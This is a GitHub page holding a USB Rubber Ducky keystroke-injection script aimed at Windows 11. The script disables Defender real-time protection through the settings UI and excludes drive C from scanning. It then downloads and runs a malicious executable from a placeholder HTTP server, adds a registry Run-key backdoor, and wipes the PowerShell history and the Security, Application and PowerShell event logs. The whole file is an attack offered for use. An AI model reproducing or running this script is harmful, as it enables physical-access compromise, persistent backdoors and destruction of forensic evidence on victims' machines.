-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwin11_ducky_pwn.txt
More file actions
97 lines (83 loc) · 1.92 KB
/
Copy pathwin11_ducky_pwn.txt
File metadata and controls
97 lines (83 loc) · 1.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
REM Title: Windows 11 Ducky PWN
REM Author: Meeps-Underflow
REM Description: Opens security settings, disabled Defender, then adds an exception of drive C for persistence
REM Description: Downloads malicous exe from hosted http server then executes it
REM Description: Establishes Persistence
REM Description: CLeans Up Activity
REM Target: Windows 11 (Powershell)
REM Pause for everything to recognize and be ready
DELAY 2000
REM Open Windows Defender Settings
CTRL ESC
DELAY 750
STRING windows security
DELAY 250
ENTER
DELAY 1000
ENTER
REM Navigate to Manage Settings
DELAY 500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 500
REM Open and turn off Realtime Protection
SPACE
DELAY 1000
ALT TAB
DELAY 750
ALT y
DELAY 1000
REM Exit security settings
ALT F4
DELAY 500
REM Open PowerShell
GUI r
DELAY 500
STRING powershell
CTRL-SHIFT ENTER
DELAY 1000
ALT TAB
DELAY 750
ALT y
DELAY 1000
REM Exclude drive C from Defender
STRING Add-MpPreference -ExclusionPath "C:"
ENTER
DELAY 500
REM download nice3.exe from http server running x.x.x.x ip
STRING powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://x.x.x.x/nice3.exe', 'C:\Users\Default\AppData\Roaming\Microsoft\Windows\nice3.exe')"
ENTER
DELAY 1000
REM execute nice3.exe
STRING powershell start "C:\Users\Default\AppData\Roaming\Microsoft\Windows\nice3.exe"
ENTER
DELAY 1000
REM Deploy persistant backdoor
STRING Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "nice3" -Value "C:\Users\Default\AppData\Roaming\Microsoft\Windows\nice3.exe"
ENTER
DELAY 500
REM Clear PowerShell Command History
STRING Remove-Item (Get-PSReadlineOption).HistorySavePath -Force
ENTER
DELAY 500
REM Clear PowerShell Logs
STRING wevtutil cl Microsoft-Windows-PowerShell/Operational
ENTER
DELAY 500
REM Clear Event Logs
STRING wevtutil cl Security
ENTER
DELAY 500
STRING wevtutil cl Application
ENTER
DELAY 500
REM Exit Powershell
STRING EXIT
ENTER